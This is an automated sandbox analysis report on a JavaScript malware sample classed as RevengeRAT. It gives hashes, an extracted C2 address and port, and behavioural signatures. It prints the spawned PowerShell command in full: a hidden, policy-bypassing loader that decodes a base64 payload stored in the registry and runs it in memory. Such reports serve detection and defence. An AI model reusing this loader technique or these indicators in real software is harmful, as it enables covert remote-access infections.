Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-12-2024 01:01
Static task
static1
Behavioral task
behavioral1
Sample
2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d.js
Resource
win10v2004-20241007-en
General
-
Target
2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d.js
-
Size
116KB
-
MD5
0c3e47c0fb0d5a289fded25fd9746817
-
SHA1
2117b82b1724a2f146ffd015b50ce45c63d7fb87
-
SHA256
2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d
-
SHA512
bf8b2895fa9cf32c651d67ff68c3156dfd2f32e4fc9308ec5a190eaf942816feae1357086b150442c4359619356cf6cf3bd4e9bcf8d866b52c51b0c3978133ad
-
SSDEEP
1536:D12+GPp0PG/6Rn/T5d1XtQpm7GOzYCtFA:p2+GB0PG/sn/T5dt+IdG
Malware Config
Extracted
revengerat
NyanCatRevenge
38.51.135.44:333
9822cb7521c94057
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Revengerat family
-
Blocklisted process makes network request 7 IoCs
flow pid Process 2 2880 powershell.exe 3 2880 powershell.exe 4 2880 powershell.exe 5 2880 powershell.exe 6 2880 powershell.exe 7 2880 powershell.exe 8 2880 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2880 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2880 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2780 wrote to memory of 2880 2780 wscript.exe 30 PID 2780 wrote to memory of 2880 2780 wscript.exe 30 PID 2780 wrote to memory of 2880 2780 wscript.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d.js1⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-